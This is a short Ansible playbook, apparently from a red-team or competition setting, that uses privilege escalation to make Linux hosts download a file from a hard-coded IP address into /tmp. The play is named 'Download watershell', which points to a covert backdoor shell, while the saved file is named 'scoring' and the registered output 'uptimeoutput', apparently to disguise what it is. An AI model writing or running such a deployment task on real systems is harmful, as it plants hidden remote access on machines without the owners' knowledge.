- name: Download watershell
  hosts: linux
  become: true
  become_method: enable
  ignore_errors: true
  tasks:
    - name: download watershell
      register: uptimeoutput
      command: "wget 10.12.48.21/scoring -O /tmp/scoring;"


